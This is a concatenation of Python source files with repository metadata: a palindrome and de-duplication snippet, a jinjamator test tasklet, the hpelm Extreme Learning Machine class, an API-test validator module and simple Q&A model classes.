    The function and parameter names are kept as-is for compatibility
    ("plaindron" is a typo for "palindrome"; the param shadows builtin
    ``str``).  The original built forward/backward copies with a dead
    ``res`` variable whose ``if i != res`` test was always true; comparing
    against the reversed slice is equivalent, including for "".
    """
    return str == str[::-1]
print(plaindron("madam"))  # True: "madam" reads the same backwards
# Sample input for the de-duplication helper below.
arr = [2, 4, 5, 6, 6, 7, 7]
def dup(arr):
    """Return the elements of *arr* with duplicates removed, keeping
    first-seen order."""
    unique = []
    observed = set()
    for item in arr:
        if item in observed:
            continue  # already emitted this value
        observed.add(item)
        unique.append(item)
    return unique
print(dup(arr))  # expected: [2, 4, 5, 6, 7]
|
[
"yusuf_ctg@yahoo.com"
] |
yusuf_ctg@yahoo.com
|
02e1886687e685e3453d23f41cb3360130636eed
|
aa9b90475c72cea499cc2149770547c2f23dca79
|
/tests/plugins/content/task/01_run.py
|
83c48c18f73923596dbb135caccd4fb3c31dc0a5
|
[
"Apache-2.0"
] |
permissive
|
DrackThor/jinjamator
|
cfa0f58bb78a5a7ae8f3c7f3fe23ead35496afc2
|
9a61f76e3ddc9cb7c6fa20a5bd63963a49777318
|
refs/heads/master
| 2022-07-31T02:20:12.268091
| 2020-04-30T08:33:08
| 2020-04-30T08:33:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
# Jinjamator tasklet: run the child task ".subtask1/" and verify every result.
# NOTE(review): the bare `task` object and the module-level `return` are valid
# only inside the jinjamator task runner, which executes this file as a
# tasklet body -- this is not a standalone Python module.
ok = True
for subtask_path, return_value in task.run(".subtask1/", output_plugin="null").items():
    # every result must come from the expected tasklet ...
    if "01_tasklet_1" not in subtask_path:
        ok = False
    # ... and must have returned the literal string "OK"
    if return_value != "OK":
        ok = False
if ok:
    return "OK"
else:
    return "NOT OK"
|
[
"jinjamator@aci.guru"
] |
jinjamator@aci.guru
|
7a8f839a3ef43d59643127a209d4684b91d188f4
|
eefb06b0d8c8c98c1e9cfc4c3852d5c453eb5429
|
/data/input/akusok/hpelm/hpelm/elm.py
|
75618f3e9ee6d4cb01745a484eadfd24ec48794c
|
[] |
no_license
|
bopopescu/pythonanalyzer
|
db839453bde13bf9157b76e54735f11c2262593a
|
8390a0139137574ab237b3ff5fe8ea61e8a0b76b
|
refs/heads/master
| 2022-11-22T02:13:52.949119
| 2019-05-07T18:42:52
| 2019-05-07T18:42:52
| 282,079,884
| 0
| 0
| null | 2020-07-23T23:46:09
| 2020-07-23T23:46:08
| null |
UTF-8
|
Python
| false
| false
| 26,584
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from six.moves import cPickle
from six import integer_types
from tables import open_file
from .nnets.slfn import SLFN
from .nnets.slfn_python import SLFNPython
from .modules import mrsr, mrsr2
from .mss_v import train_v
from .mss_cv import train_cv
from .mss_loo import train_loo
class ELM(object):
"""Interface for training Extreme Learning Machines (ELM).
Args:
inputs (int): dimensionality of input data, or number of data features
outputs (int): dimensionality of output data, or number of classes
classification ('c'/'wc'/'ml', optional): train ELM for classification ('c') / weighted classification ('wc') /
multi-label classification ('ml'). For weighted classification you can provide weights in `w`. ELM will
compute and use the corresponding classification error instead of Mean Squared Error.
w (vector, optional): weights vector for weighted classification, length (`outputs` * 1).
batch (int, optional): batch size for data processing in ELM, reduces memory requirements. Does not work
for model structure selection (validation, cross-validation, Leave-One-Out). Can be changed later directly
as a class attribute.
accelerator ("GPU"/"basic", optional): type of accelerated ELM to use: None, 'GPU', 'basic', ...
precision (optional): data precision to use, supports single ('single', '32' or numpy.float32) or double
('double', '64' or numpy.float64). Single precision is faster but may cause numerical errors. Majority
of GPUs work in single precision. Default: **double**.
norm (double, optional): L2-normalization parameter, **None** gives the default value.
tprint (int, optional): ELM reports its progress every `tprint` seconds or after every batch,
whatever takes longer.
Class attributes; attributes that simply store initialization or `train()` parameters are omitted.
Attributes:
nnet (object): Implementation of neural network with computational methods, but without
complex logic. Different implementations are given by different classes: for Python, for GPU, etc.
See ``hpelm.nnets`` folder for particular files. You can implement your own computational algorithm
by inheriting from ``hpelm.nnets.SLFN`` and overwriting some methods.
flist (list of strings): Available types of neurons, use them when adding new neurons.
Note:
Below the 'matrix' type means a 2-dimensional Numpy.ndarray.
"""
# TODO: note about HDF5 instead of matrix for Matlab compatibility
def __init__(self, inputs, outputs, classification="", w=None, batch=1000, accelerator=None,
             precision='double', norm=None, tprint=5):
    """Create an untrained ELM; see the class docstring for argument details."""
    assert isinstance(inputs, integer_types), "Number of inputs must be integer"
    assert isinstance(outputs, integer_types), "Number of outputs must be integer"
    assert batch > 0, "Batch should be positive"
    self.batch = int(batch)

    # Resolve the requested numeric precision; default is float64.
    self.precision = np.float64
    if precision in (np.float32, np.float64):
        self.precision = precision
    elif 'double' in precision.lower() or '64' in precision:
        self.precision = np.float64
    # FIX: 'single' check now lower-cases like the 'double' branch,
    # so "Single" is recognized too.
    elif 'single' in precision.lower() or '32' in precision:
        self.precision = np.float32
    else:
        print("Unknown precision parameter: %s, using double precision" % precision)

    # Create the SLFN solver that performs the actual computations.
    # FIX: the accelerator checks used ``is`` (identity) against string
    # literals, which only worked because of CPython string interning;
    # ``==`` compares by value.
    self.accelerator = accelerator
    if accelerator == "GPU":
        print("Using CUDA GPU acceleration with Scikit-CUDA")
        # FIX: package-relative import, consistent with the module's
        # other ``from .nnets...`` imports.
        from .nnets.slfn_skcuda import SLFNSkCUDA
        self.nnet = SLFNSkCUDA(inputs, outputs, precision=self.precision, norm=norm)
    elif accelerator == "basic":
        print("Using slower basic Python solver")
        self.nnet = SLFN(inputs, outputs, precision=self.precision, norm=norm)
    else:  # double precision Numpy solver
        self.nnet = SLFNPython(inputs, outputs, precision=self.precision, norm=norm)

    # Classification mode: None means plain regression.
    self.classification = None
    if classification.lower() in ("c", "wc", "ml", "mc"):  # 'mc' kept as an alias of 'ml'
        self.classification = classification.replace("mc", "ml")
    self.wc = None  # per-class weights for weighted classification
    if w is not None:
        w = np.array(w)
        assert len(w) == outputs, "Number of class weights must be equal to the number of classes"
        self.wc = w

    self.opened_hdf5 = []  # opened HDF5 files, closed in the ELM destructor
    self.ranking = None
    self.kmax_op = None
    self.tprint = tprint  # interval in seconds between progress (ETA) reports
    self.flist = ("lin", "sigm", "tanh", "rbf_l1", "rbf_l2", "rbf_linf")  # supported neuron types
def __str__(self):
s = "ELM with %d inputs and %d outputs\n" % (self.nnet.inputs, self.nnet.outputs)
s += "Hidden layer neurons: "
for n, func, _, _ in self.nnet.neurons:
s += "%d %s, " % (n, func)
s = s[:-2]
return s
def _train_parse_args(self, args, kwargs):
    """Parse training args and set corresponding class variables.

    Recognized positional flags (upper-cased here): ranking "OP" and task
    type "C"/"WC"/"ML"/"MC" or "R" for plain regression; the model-structure
    flags "V"/"CV"/"LOO" are only validated for exclusivity here and acted
    upon by the caller.  Keyword args handled: ``kmax`` (with "OP"),
    ``w`` (with "WC") and ``batch``.
    """
    assert len(self.nnet.neurons) > 0, "Add neurons to ELM before training it"
    args = [a.upper() for a in args]  # make all arguments upper case
    # reset any state left from a previous training run
    self.nnet.reset()  # remove previous training
    self.ranking = None
    self.kmax_op = None
    self.classification = None  # c / wc / ml
    self.wc = None  # weigths for weighted classification
    # check mutually exclusive parameters
    assert len(set(args).intersection({"V", "CV", "LOO"})) <= 1, "Use only one of V / CV / LOO"
    msg = "Use only one of: C (classification) / WC (weighted classification) / ML (multi-label classification)"
    assert len(set(args).intersection({"C", "WC", "ML", "MC"})) <= 1, msg
    # parse parameters
    for a in args:
        if a == "OP":
            self.ranking = "OP"
            if "kmax" in kwargs.keys():
                self.kmax_op = int(kwargs["kmax"])
        if a == "C":
            assert self.nnet.outputs > 1, "Classification outputs must have 1 output per class"
            self.classification = "c"
        if a == "WC":
            assert self.nnet.outputs > 1, "Classification outputs must have 1 output per class"
            self.classification = "wc"
            # explicit class weights override the automatic ones
            if 'w' in kwargs.keys():
                w = np.array(kwargs['w'])
                assert len(w) == self.nnet.outputs, "Number of class weights must be equal to the number of classes"
                self.wc = w
        if a == "ML" or a == "MC":  # 'MC' accepted as an alias of 'ML'
            assert self.nnet.outputs > 1, "Classification outputs must have 1 output per class"
            self.classification = "ml"
        if a == "R":
            self.classification = None  # reset to regression
    if "batch" in kwargs.keys():
        self.batch = int(kwargs["batch"])
def train(self, X, T, *args, **kwargs):
    """Universal training interface for ELM model with model structure selection.

    Model structure selection takes more time and requires all data to fit into
    memory.  Optimal pruning ('OP', effectively an L1-regularization) takes the
    most time but gives the smallest and best performing model.  Choosing a
    classification forces ELM to use classification error in model structure
    selection, and in the `error()` method output.

    Args:
        X (matrix): input data matrix, size (N * `inputs`)
        T (matrix): outputs data matrix, size (N * `outputs`)
        'V'/'CV'/'LOO' (string, choose one): model structure selection with a
            validation set ('V'), cross-validation ('CV') or Leave-One-Out ('LOO')
        'OP' (string, use with 'V'/'CV'/'LOO'): choose best neurons instead of
            random ones; equivalent to L1-regularization
        'c'/'wc'/'ml'/'r' (string, choose one): classification, weighted
            classification, multi-label classification, or plain regression.
            Overwrites parameters given at ELM initialization time.

    Keyword Args:
        Xv (matrix, use with 'V'): validation set inputs, size (Nv * `inputs`)
        Tv (matrix, use with 'V'): validation set outputs, size (Nv * `outputs`)
        k (int, use with 'CV'): number of splits for cross-validation, k >= 3
        kmax (int, optional, use with 'OP'): maximum number of neurons to keep
        batch (int, optional): batch size, overwrites the initialization value

    Returns:
        e (double, for 'CV'): test error from the cross-validation procedure
    """
    X, T = self._checkdata(X, T)
    # FIX: flags were only upper-cased inside _train_parse_args' local copy,
    # so the "V"/"CV"/"LOO" dispatch below silently ignored lower-case flags
    # (the old "test upper case and lower case" TODO).  Normalize once here
    # so the whole method is case-insensitive.
    args = [a.upper() for a in args]
    self._train_parse_args(args, kwargs)
    if "V" in args:  # use validation set
        assert "Xv" in kwargs.keys(), "Provide validation dataset (Xv)"
        assert "Tv" in kwargs.keys(), "Provide validation outputs (Tv)"
        Xv = kwargs['Xv']
        Tv = kwargs['Tv']
        Xv, Tv = self._checkdata(Xv, Tv)
        train_v(self, X, T, Xv, Tv)
    elif "CV" in args:  # use cross-validation
        assert "k" in kwargs.keys(), "Provide Cross-Validation number of splits (k)"
        k = kwargs['k']
        assert k >= 3, "Use at least k=3 splits for Cross-Validation"
        e = train_cv(self, X, T, k)
        return e
    elif "LOO" in args:  # use Leave-One-Out error on training set
        train_loo(self, X, T)
    else:  # basic training algorithm
        self.add_data(X, T)
        self.nnet.solve()

# TODO: Adaptive ELM model for timeseries (someday)
def add_data(self, X, T):
"""Feed new training data (X,T) to ELM model in batches; does not solve ELM itself.
Helper method that updates intermediate solution parameters HH and HT, which are used for solving ELM later.
Updates accumulate, so this method can be called multiple times with different parts of training data.
To reset accumulated training data, use `ELM.nnet.reset()`.
For training an ELM use `ELM.train()` instead.
Args:
X (matrix): input training data
T (matrix): output training data
"""
# initialize batch size
nb = int(np.ceil(float(X.shape[0]) / self.batch))
wc_vector = None
# find automatic weights if none are given
if self.classification == "wc" and self.wc is None:
ns = T.sum(axis=0).astype(self.precision) # number of samples in classes
self.wc = ns.sum() / ns # weights of classes
for X0, T0 in zip(np.array_split(X, nb, axis=0),
np.array_split(T, nb, axis=0)):
if self.classification == "wc":
wc_vector = self.wc[np.where(T0 == 1)[1]] # weights for samples in the batch
self.nnet.add_batch(X0, T0, wc_vector)
def add_neurons(self, number, func, W=None, B=None):
    """Add hidden-layer neurons to the model, generating random W/B if absent.

    Adds ``number`` neurons of type ``func`` (one of ``self.flist`` or a
    custom ``numpy.ufunc``).  ``W`` is the projection matrix of size
    (`inputs` * `number`) (for 'rbf_' neurons it holds transposed centroids);
    ``B`` is the bias vector of length `number` (RBF widths for 'rbf_'
    neurons).  Prepared neurons are handed over to ``self.nnet.add_neurons``.
    """
    assert isinstance(number, integer_types), "Number of neurons must be integer"
    assert (func in self.flist or isinstance(func, np.ufunc)), \
        "'%s' neurons not suppored: use a standard neuron function or a custom <numpy.ufunc>" % func
    assert isinstance(W, (np.ndarray, type(None))), "Projection matrix (W) must be a Numpy ndarray"
    assert isinstance(B, (np.ndarray, type(None))), "Bias vector (B) must be a Numpy ndarray"
    inputs = self.nnet.inputs

    if W is None:
        # default projection: linear neurons copy input features, the rest
        # get a random Gaussian projection
        if func == "lin":
            number = min(number, inputs)  # cannot have more linear neurons than features
            W = np.eye(inputs, number)
        else:
            W = np.random.randn(inputs, number)
            if func not in ("rbf_l1", "rbf_l2", "rbf_linf"):
                W *= 3.0 / inputs**0.5  # high dimensionality fix
    if B is None:
        B = np.random.randn(number)
        if func in ("rbf_l2", "rbf_l1", "rbf_linf"):
            B = np.abs(B)
            B *= inputs  # RBF widths scale with input dimensionality
        if func == "lin":
            B = np.zeros((number,))  # linear neurons carry no bias

    assert W.shape == (inputs, number), \
        "W must be size [inputs, neurons] (expected [%d,%d])" % (inputs, number)
    assert B.shape == (number,), "B must be size [neurons] (expected [%d])" % number

    # cast to the model's precision and register with the solver
    self.nnet.add_neurons(number, func, W.astype(self.precision), B.astype(self.precision))
def error(self, T, Y):
"""Calculate error of model predictions.
Computes Mean Squared Error (MSE) between model predictions Y and true outputs T.
For classification, computes mis-classification error.
For multi-label classification, correct classes are all with Y>0.5.
For weighted classification the error is an average weighted True Positive Rate,
or percentage of correctly predicted samples for each class, multiplied by weight
of that class and averaged. If you want something else, just write it yourself :)
See https://en.wikipedia.org/wiki/Confusion_matrix for details.
Another option is to use scikit-learn's performance metrics. Transform `Y` and `T` into scikit's
format by ``y_true = T.argmax[1]``, ``y_pred = Y.argmax[1]``.
http://scikit-learn.org/stable/modules/classes.html#module-sklearn.metrics
Args:
T (matrix): true outputs.
Y (matrix): ELM model predictions, can be computed with `predict()` function.
Returns:
e (double): MSE for regression / classification error for classification.
"""
_, T = self._checkdata(None, T)
_, Y = self._checkdata(None, Y)
return self._error(T, Y)
def confusion(self, T, Y):
"""Computes confusion matrix for classification.
Confusion matrix :math:`C` such that element :math:`C_{i,j}` equals to the number of observations known
to be class :math:`i` but predicted to be class :math:`j`.
Args:
T (matrix): true outputs or classes, size (N * `outputs`)
Y (matrix): predicted outputs by ELM model, size (N * `outputs`)
Returns:
conf (matrix): confusion matrix, size (`outputs` * `outputs`)
"""
# TODO: ELM type can be assigned at creation time: "c", "wc", "ml"
assert self.classification in ("c", "wc", "ml"), "Confusion matrix works only for regression"
_, T = self._checkdata(None, T)
_, Y = self._checkdata(None, Y)
N = T.shape[0]
nb = int(np.ceil(float(N) / self.batch)) # number of batches
C = self.nnet.outputs
conf = np.zeros((C, C))
if self.classification in ("c", "wc"):
for b in xrange(nb):
start = b*self.batch
stop = min((b+1)*self.batch, N)
Tb = np.array(T[start:stop]).argmax(1)
Yb = np.array(Y[start:stop]).argmax(1)
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.logical_and(Tb == c1, Yb == c1h).sum()
elif self.classification == "ml":
for b in xrange(nb):
start = b*self.batch
stop = min((b+1)*self.batch, N)
Tb = np.array(T[start:stop]) > 0.5
Yb = np.array(Y[start:stop]) > 0.5
for c1 in xrange(C):
for c1h in xrange(C):
conf[c1, c1h] += np.sum(Tb[:, c1] * Yb[:, c1h])
return conf
def project(self, X):
"""Get ELM's hidden layer representation of input data.
Args:
X (matrix): input data, size (N * `inputs`)
Returns:
H (matrix): hidden layer representation matrix, size (N * number_of_neurons)
"""
X, _ = self._checkdata(X, None)
H = self.nnet._project(X)
return H
def predict(self, X):
"""Predict outputs Y for the given input data X.
Args:
X (matrix): input data of size (N * `inputs`)
Returns:
Y (matrix): output data or predicted classes, size (N * `outputs`).
"""
X, _ = self._checkdata(X, None)
Y = self.nnet._predict(X)
return Y
def save(self, fname):
"""Save ELM model with current parameters.
Model does not save a particular solver, precision batch size. They are obtained from
a new ELM when loading the model (so one can switch to another solver, for instance).
Also ranking and max number of neurons are not saved, because they
are runtime training info irrelevant after the training completes.
Args:
fname (string): filename to save model into.
"""
assert isinstance(fname, basestring), "Model file name must be a string"
m = {"inputs": self.nnet.inputs,
"outputs": self.nnet.outputs,
"Classification": self.classification,
"Weights_WC": self.wc,
"neurons": self.nnet.get_neurons(),
"norm": self.nnet.norm, # W and bias are here
"Beta": self.nnet.get_B()}
try:
cPickle.dump(m, open(fname, "wb"), -1)
except IOError:
raise IOError("Cannot create a model file at: %s" % fname)
def load(self, fname):
"""Load ELM model data from a file.
Load requires an ``ELM`` object, and it uses solver type, precision and batch size from that ELM object.
Args:
fname (string): filename to load model from.
"""
assert isinstance(fname, basestring), "Model file name must be a string"
try:
m = cPickle.load(open(fname, "rb"))
except IOError:
raise IOError("Model file not found: %s" % fname)
inputs = m["inputs"]
outputs = m["outputs"]
self.classification = m["Classification"]
self.wc = m["Weights_WC"]
# create a new solver and load neurons / Beta into it with correct precision
if self.accelerator is None:
self.nnet = SLFN(inputs, outputs, precision=self.precision)
for number, func, W, B in m["neurons"]:
self.nnet.add_neurons(number, func, W.astype(self.precision), B.astype(self.precision))
self.nnet.norm = m["norm"]
if m["Beta"] is not None:
self.nnet.set_B(np.array(m["Beta"], dtype=self.precision))
def __del__(self):
# Closes any HDF5 files opened during HPELM usage.
for h5 in self.opened_hdf5:
h5.close()
    def _error(self, T, Y, R=None):
        """Returns regression/classification/multiclass error, also for PRESS.
        An ELM-specific error with PRESS support.

        Args:
            T (matrix): true outputs.
            Y (matrix): predicted outputs.
            R: optional per-sample PRESS residual scaling; when given, the
                leave-one-out (LOO) PRESS variant of each error is computed.

        Returns:
            err (np.float64): scalar error value; never NaN (asserted).
        """
        if R is None:  # normal classification error
            if self.classification == "c":
                # fraction of samples whose predicted class differs from the true one
                err = np.not_equal(Y.argmax(1), T.argmax(1)).mean()
            elif self.classification == "wc":  # weighted classification
                c = T.shape[1]
                errc = np.zeros(c)
                for i in xrange(c):  # per-class MSE
                    idx = np.where(T[:, i] == 1)[0]
                    if len(idx) > 0:  # classes absent from T keep zero error
                        errc[i] = np.not_equal(Y[idx].argmax(1), i).mean()
                # weighted average of per-class error rates
                err = np.sum(errc * self.wc) / np.sum(self.wc)
            elif self.classification == "ml":
                # multi-label: a class is "on" when output > 0.5
                err = np.not_equal(Y > 0.5, T > 0.5).mean()
            else:
                # regression: plain MSE
                err = np.mean((Y - T)**2)
        else:  # LOO_PRESS error
            if self.classification == "c":
                err = np.not_equal(Y.argmax(1), T.argmax(1)) / R.ravel()
                err = np.mean(err**2)
            elif self.classification == "wc":  # balanced classification
                c = T.shape[1]
                errc = np.zeros(c)
                for i in xrange(c):  # per-class MSE
                    idx = np.where(T[:, i] == 1)[0]
                    if len(idx) > 0:
                        t = np.not_equal(Y[idx].argmax(1), i) / R[idx].ravel()
                        errc[i] = np.mean(t**2)
                err = np.mean(errc * self.wc)
            elif self.classification == "ml":
                err = np.not_equal(Y > 0.5, T > 0.5) / R.reshape((-1, 1))
                err = np.mean(err**2)
            else:
                # regression PRESS: residuals scaled by R before averaging
                err = (Y - T) / R.reshape((-1, 1))
                err = np.mean(err**2)
        assert not np.isnan(err), "Error is NaN at %s" % self.classification
        return np.float64(err)
    def _ranking(self, L, H=None, T=None):
        """Return ranking of hidden neurons; random or OP.

        Args:
            L (int): number of neurons
            H (matrix): hidden layer representation matrix needed for optimal pruning
            T (matrix): outputs matrix needed for optimal pruning

        Returns:
            rank (vector): ranking of neurons
            L (int): number of selected neurons, can be changed by `self.kmax_op`
        """
        if self.ranking == "OP":  # optimal ranking (L1 normalization)
            assert H is not None and T is not None, "Need H and T to perform optimal pruning"
            if self.kmax_op is not None:  # apply maximum number of neurons
                L = min(self.kmax_op, L)
            if T.shape[1] < 10:  # fast mrsr for less outputs but O(2^t) in outputs
                rank = mrsr(H, T, L)
            else:  # slow mrsr for many outputs but O(t) in outputs
                rank = mrsr2(H, T, L)
        else:  # random ranking
            # a random permutation of neuron indices
            rank = np.arange(L)
            np.random.shuffle(rank)
        return rank, L
def _checkdata(self, X, T):
"""Checks data variables and fixes matrix dimensionality issues.
"""
if X is not None:
if isinstance(X, basestring): # open HDF5 file
try:
h5 = open_file(X, "r")
except:
raise IOError("Cannot read HDF5 file at %s" % X)
self.opened_hdf5.append(h5)
node = None
for node in h5.walk_nodes():
pass # find a node with whatever name
if node:
X = node
else:
raise IOError("Empty HDF5 file at %s" % X)
else:
# assert isinstance(X, np.ndarray) and
assert X.dtype.kind not in "OSU", "X must be a numerical numpy array"
if len(X.shape) == 1:
X = X.reshape(-1, 1)
assert len(X.shape) == 2, "X must have 2 dimensions"
assert X.shape[1] == self.nnet.inputs, "X has wrong dimensionality: expected %d, found %d" % \
(self.nnet.inputs, X.shape[1])
if T is not None:
if isinstance(T, basestring): # open HDF5 file
try:
h5 = open_file(T, "r")
except IOError:
raise IOError("Cannot read HDF5 file at %s" % T)
self.opened_hdf5.append(h5)
node = None
for node in h5.walk_nodes():
pass # find a node with whatever name
if node:
T = node
else:
raise IOError("Empty HDF5 file at %s" % X)
else:
# assert isinstance(T, np.ndarray) and
assert T.dtype.kind not in "OSU", "T must be a numerical numpy array"
if len(T.shape) == 1:
T = T.reshape(-1, 1)
assert len(T.shape) == 2, "T must have 2 dimensions"
assert T.shape[1] == self.nnet.outputs, "T has wrong dimensionality: expected %d, found %d" % \
(self.nnet.outputs, T.shape[1])
if (X is not None) and (T is not None):
assert X.shape[0] == T.shape[0], "X and T cannot have different number of samples"
return X, T
|
[
"rares.begu@gmail.com"
] |
rares.begu@gmail.com
|
e5b7b2a0eaf2d4a4f3b75aa835d0d5e97a95c621
|
2f79a610ee7b3291d408f935715464f84bfe1293
|
/Common/validator.py
|
3f92e8440cd99af17f58990d54c05f5e5148bba5
|
[] |
no_license
|
runnerhuang/autoapi
|
508ebd07b51758c29a520b9292588294e3967fc6
|
2601014b3be6c9aa4181a3cc9a1d4a127c01091e
|
refs/heads/master
| 2023-03-17T20:42:27.693522
| 2020-03-29T03:08:45
| 2020-03-29T03:08:45
| 247,009,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,697
|
py
|
import re
# from util import decode_str
def type_validator(params, value):
    """True when the type name of params equals value; for a list, every
    element's type name must appear in value (substring/containment match),
    or value may be the literal string "list"."""
    if isinstance(params, list):
        if value == "list":
            return True
        hits = 0
        for item in params:
            name = type(item).__name__
            if name == "unicode":  # py2 text: compare the encoded type instead
                name = type(item.encode("utf-8")).__name__
            if name in value:  # containment, as in the original contract
                hits += 1
        return hits == len(params)
    return type(params).__name__ == value
def type_in_validator(params, value):
    """True when the type name of params (or of every list element) is
    contained in value (a string or a collection of type names)."""
    if isinstance(params, list):
        hits = 0
        for item in params:
            name = type(item).__name__
            if name == "unicode":  # py2 text: compare the encoded type instead
                name = type(item.encode("utf-8")).__name__
            if name in value:
                hits += 1
        return hits == len(params)
    return type(params).__name__ in value
def between_validator(params, value):
    """True when params (an int, or a list of ints) lies within the inclusive
    range [value[0], value[1]]; non-int inputs fail.

    BUG FIX: the original tested ``isinstance(params, int)`` inside the list
    loop (instead of each element), so every list input returned False.
    """
    if isinstance(params, list):
        for item in params:
            if not isinstance(item, int):
                return False
            if not (value[0] <= item <= value[1]):
                return False
        return True
    if not isinstance(params, int):
        return False
    return value[0] <= params <= value[1]
def values_validator(params, value):
    """True when params (or every element of a params list) is contained in value."""
    if isinstance(params, list):
        return all(item in value for item in params)
    return params in value
def len_list_validator(params, value):
    """True when params is a list of the expected length; value may be an int
    or an arithmetic string (e.g. "2*3") that is evaluated first."""
    if not isinstance(params, list):
        return False
    if isinstance(value, str):
        if any(op in value for op in ("*", "/", "+", "-")):
            value = int(eval(value))  # NOTE: eval of a length expression -- trusted specs only
    return len(params) == value
def len_validator(params, value):
    """True when len(params) equals len(value); for a params list, every
    element's length must equal len(value)."""
    expected = len(value)
    if isinstance(params, list):
        return all(len(item) == expected for item in params)
    return len(params) == expected
def equal_validator(params, value):
    """True when str(params) == str(value); a value string containing an
    arithmetic operator is eval'd first (failures are ignored)."""
    try:
        if "*" in value or "/" in value or "+" in value or "-" in value:
            value = eval(value)  # NOTE: eval on the expected-value spec -- trusted input only
    except Exception:
        pass  # non-string value: compare as-is
    return str(params) == str(value)
def not_equal_validator(params, value):
    """True when params differs from value."""
    return params != value
def string_in_validator(params, value):
    """True when value occurs inside params (substring/membership test)."""
    return value in params
def value_in_validator(params, value):
    """True when value is an element of params (list) or equals params (scalar)."""
    if isinstance(params, list):
        return value in params
    return value == params
def in_validator(param, value):
    """True when param is an element of value (list) or equals value (str);
    any other value type fails."""
    if isinstance(value, list):
        return param in value
    if isinstance(value, str):
        return param == value
    return False
def greater_validator(params, value):
    """True when params >= value; a value string is eval'd first."""
    threshold = eval(value) if isinstance(value, str) else value  # NOTE: eval -- trusted specs only
    return params >= threshold
def gv_validator(params, value):
    """True when params is strictly greater than value; a non-int value is eval'd."""
    if not isinstance(value, int):
        value = eval(value)  # NOTE: eval -- trusted specs only
    return params > value
def lv_validator(params, value):
    """True when params is strictly less than value; a non-int value is eval'd."""
    if not isinstance(value, int):
        value = eval(value)  # NOTE: eval -- trusted specs only
    return params < value
def less_validator(params, value):
    """True when params <= eval(value); value must be an eval-able string."""
    return params <= eval(value)  # NOTE: eval -- trusted specs only
def not_found_validator(params, value):
    """True when value is NOT contained in params (list/str), or when a scalar
    params differs from value.

    BUG FIX: the original fell off the end (implicitly returning None) when a
    list or string *did* contain value; every path now returns an explicit bool.
    """
    if isinstance(params, (list, str)):
        return value not in params
    return params != value
def reg_validator(params, value):
    """True when regex value matches params (or every element of a params list)
    at the start of the string.

    A match whose matched text is empty counts as a failure (mirrors the
    truthiness test on ``group(0)``). Match failures are reported on stdout.
    """
    # print decode_str(params)
    if isinstance(params, list):
        hits = 0
        for item in params:
            # if type(each).__name__ == "unicode":
            #     each = each.encode("utf-8")
            try:
                if re.match(value, item).group(0):
                    hits += 1
            except Exception as e:
                print(e)
                print("Cannot find the regular pattern @ return: {}".format(item))
                return False
        return hits == len(params)
    try:
        if type(value).__name__ == "unicode":
            value = value.encode("utf-8")
        if re.match(value, params).group(0):
            return True
    except Exception as e:
        print(e)
        print("Cannot find the regular pattern @ return: {}".format(params))
        return False
    return False
class ValidatorRegistry(object):
    """Class-level name -> entry registry shared by all instances.

    NOTE(review): `checker` stores the *result* (a bool) of each validator
    call here, not a validator object, so `validate()` -- which expects an
    entry with a `.validate` method -- would fail on entries registered via
    `checker`; confirm intended usage.
    """
    # Shared across all instances: one global mapping of registered entries.
    registry = {}

    @classmethod
    def register(cls, name, validate):
        # Stores (or overwrites) the entry under `name`.
        cls.registry[name] = validate

    @classmethod
    def validate(cls, name, params, value):
        # Delegates to the registered entry; raises KeyError for unknown names.
        return cls.registry[name].validate(params, value)
def checker(typo, params, value):
    """Run the validator named by typo against (params, value) and return its result.

    Validator names are accepted in all-lowercase or all-uppercase form only
    (e.g. "eq" / "EQ"); an unknown or mixed-case name that was never registered
    raises KeyError when the registry is read back.
    """
    dispatch = {
        "type": type_validator,
        "len": len_validator,
        "le": less_validator,
        "between": between_validator,
        "eq": equal_validator,
        "in": in_validator,
        "ge": greater_validator,
        "gv": gv_validator,
        "lv": lv_validator,
        "re": reg_validator,
        "allin": values_validator,
        "typein": type_in_validator,
        "nf": not_found_validator,
        "neq": not_equal_validator,
        "ll": len_list_validator,
        "strin": string_in_validator,
        "vin": value_in_validator,
    }
    val = ValidatorRegistry()
    key = typo.lower()
    # Register only for exact lowercase or uppercase spellings, like the
    # original if-chain did ("Eq" falls through and raises KeyError below).
    if (typo == key or typo == typo.upper()) and key in dispatch:
        val.register(typo, dispatch[key](params, value))
    return val.registry[typo]
|
[
"45131712@qq.com"
] |
45131712@qq.com
|
bea5502ce63a6fff87edbebaca3c08dde1c37919
|
8ac5c46450f9df9e184121d01a56ecdd1e8c0fa7
|
/v1/app/models.py
|
479b70222f447ff3a1d654337e6469922cf43456
|
[] |
no_license
|
mmosoroohh/StackOverflow-lite
|
1c4688fbceb107317857595898ba7952baea7642
|
93821a3a1057d17090be868b2419b44b0e4f2aa6
|
refs/heads/challenge3
| 2022-12-22T14:48:31.331212
| 2018-09-30T20:45:15
| 2018-09-30T20:45:15
| 144,048,461
| 0
| 1
| null | 2022-12-08T02:47:10
| 2018-08-08T17:47:13
|
Python
|
UTF-8
|
Python
| false
| false
| 637
|
py
|
class Question(object):
    """This class represents the Questions in StackOverflow-lite."""
    def __init__(self, question, date_posted):
        # question: the question body text; date_posted: when it was asked.
        self.question = question
        self.date_posted = date_posted
class Answer(object):
    """This class represents the Answers in StackOverflow."""
    def __init__(self, answer, date_posted):
        # answer: the answer body text; date_posted: when it was posted.
        self.answer = answer
        self.date_posted = date_posted
class User(object):
    """This class represents the Users in StackOverflow."""
    def __init__(self, name, email, password):
        # NOTE(review): password appears to be stored in plain text here --
        # confirm hashing happens elsewhere before persistence.
        self.name = name
        self.email = email
        self.password = password
|
[
"arnoldmaengwe@gmail.com"
] |
arnoldmaengwe@gmail.com
|
9d6e15e026649f4a430b934adcb95bdfec33e7f4
|
9ff397a95001895efa74a57815490704d1b681a7
|
/Chapter5/FantasyGameInventory.py
|
f35d0a56c85e7ccaac2d14debc167bff04f41a50
|
[] |
no_license
|
DanielNoble/PracticeProjects
|
1ba01fd4860bf74198d46f213961aad1555db8c2
|
346e4d47cca90f119e0fe03acc4202a77f86d3e4
|
refs/heads/master
| 2020-11-28T13:25:18.068777
| 2019-12-30T06:02:40
| 2019-12-30T06:02:40
| 229,829,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
# Starting inventory: item name -> quantity owned.
